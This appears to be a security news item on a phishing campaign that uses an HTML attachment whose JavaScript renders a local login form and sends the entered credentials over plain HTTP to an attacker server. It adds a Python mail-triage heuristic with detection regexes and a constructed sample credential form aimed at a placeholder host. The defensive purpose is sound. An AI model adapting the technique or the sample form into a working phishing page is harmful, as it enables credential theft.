A unique phishing campaign is using a new technique in an attempt to steal email account credentials.

The phishing email contains simple text referencing an attached payment notification in HTML file format, says the New Jersey Cybersecurity and Communications Integration Cell (NJCCIC). When the attachment is opened, JavaScript in the file renders a login form directly within the user’s browser rather than redirecting the user to a remote site, which, in turn, can bypass security software.

The generated form includes various email account login options and asks the user to enter the corresponding credentials, notes the NJCCIC. If they are entered, an HTTP GET request containing the supplied credentials is delivered to the threat actors via a remote web server at hxxp://7l748.l748393.96.lt/. In addition, the user is presented with a request for a recovery e-mail and phone number, which are also sent to the same remote web server.

According to a post in the SANS ISC InfoSec Forum, "sending user’s credentials to a server and then redirecting their browser to a legitimate site is a fairly common behavior for a phishing page. Although, to add insult to injury, in this case the phishing page not only steals the credentials but also transmits them over the network without any encryption in plain HTTP."
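For mail-gateway triage, the traits described above (an HTML attachment whose script builds a password form and points at a plain-HTTP endpoint) can be checked with a short heuristic. This is an added example, not code from the NJCCIC or SANS ISC; the indicator names, the sample messages and the host collector.example are constructed assumptions.

```python
import re
from email.message import EmailMessage

# Heuristic indicators for a self-contained credential form in an HTML attachment.
INDICATORS = {
    "script": re.compile(r"<script\b", re.I),
    "password_field": re.compile(r"type\s*=\s*\\?[\"']?password", re.I),
    "cleartext_http_url": re.compile(r"\bhttp://[^\s\"'<>]+", re.I),
    # Generic decoder calls; the page does not say the script was obfuscated.
    "js_decoder": re.compile(r"\b(?:unescape|atob|fromCharCode)\s*\(", re.I),
}

def triage(msg):
    """Return {filename: sorted indicator names} for each HTML attachment."""
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if not (part.get_content_type() == "text/html"
                or name.lower().endswith((".html", ".htm"))):
            continue
        # decode=True undoes base64/quoted-printable so the patterns see real HTML.
        text = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        findings[name] = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
    return findings

def is_suspicious(hits):
    """Script plus a password field or decoder call suggests a locally built login form."""
    return "script" in hits and bool({"password_field", "js_decoder"} & set(hits))

def build_message(filename, html):
    """Constructed test message: plain-text body plus one HTML attachment."""
    msg = EmailMessage()
    msg["Subject"] = "Payment notification"
    msg.set_content("Please find the payment notification attached.")
    msg.add_attachment(html, subtype="html", filename=filename)
    return msg

# Constructed samples; collector.example is a placeholder host, not from the page.
LOGIN_FORM_HTML = (
    "<html><body><script>document.write('<form method=\"get\" "
    "action=\"http://collector.example/\"><input name=\"user\">"
    "<input type=\"password\" name=\"pw\"></form>');</script></body></html>"
)
BENIGN_HTML = "<html><body><p>Invoice total: 120.00</p></body></html>"

if __name__ == "__main__":
    for fname, html in (("payment.html", LOGIN_FORM_HTML), ("invoice.html", BENIGN_HTML)):
        for name, hits in triage(build_message(fname, html)).items():
            print(name, hits, "SUSPICIOUS" if is_suspicious(hits) else "ok")
```

A match is a reason to quarantine or strip the attachment for review, not proof of phishing; heavily obfuscated scripts may surface only the `script` and `js_decoder` indicators.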

The NJCCIC recommends users refrain from opening attachments delivered with unexpected or unsolicited emails, including those from known senders. If credential compromise is suspected, users are advised to change credentials across all accounts that use the same login information and enable multi-factor authentication where available.